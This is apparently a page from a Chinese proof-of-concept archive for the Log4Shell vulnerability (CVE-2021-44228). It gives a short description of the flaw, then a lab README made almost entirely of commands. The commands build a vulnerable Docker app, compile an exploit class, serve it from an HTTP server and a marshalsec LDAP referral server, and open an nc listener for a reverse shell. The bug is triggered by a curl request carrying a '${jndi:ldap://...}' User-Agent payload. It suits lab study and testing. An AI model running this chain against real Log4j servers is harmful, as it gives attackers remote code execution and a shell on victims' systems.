关联漏洞
标题:Apache Log4j 代码问题漏洞 (CVE-2021-44228)Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
介绍
# CVE-2021-44228 (Apache Log4j2 RCE)
## Requirements
- [JDK 17](https://www.oracle.com/java/technologies/javase/jdk17-archive-downloads.html)
- [Docker](https://www.docker.com/get-started)
## Usage
1. Run application
```bash
docker build -t vulnapp .
docker run -p 8080:8080 --rm --name vulnapp vulnapp
```
2. Compile exploit
```bash
javac Exploit.java
```
3. Run http server
```bash
python3 -m http.server 8000
```
4. Run ldap server
```bash
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://host.docker.internal:8000/#Exploit"
```
5. Listen for reverse shell
```bash
nc -lvnp 9000
```
6. Trigger vulnerability
```bash
curl http://localhost:8080 -H 'User-Agent: ${jndi:ldap://host.docker.internal:1389/a}'
```
文件快照
[4.0K] /data/pocs/8c712d091179099ec29611d9e2be0b5128e39ada
├── [ 18M] app.jar
├── [2.3K] CVE-2021-44228.md
├── [ 180] Dockerfile
├── [1.3K] Exploit.java
├── [399K] image.png
├── [ 41M] marshalsec-0.0.3-SNAPSHOT-all.jar
└── [ 882] README.md
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →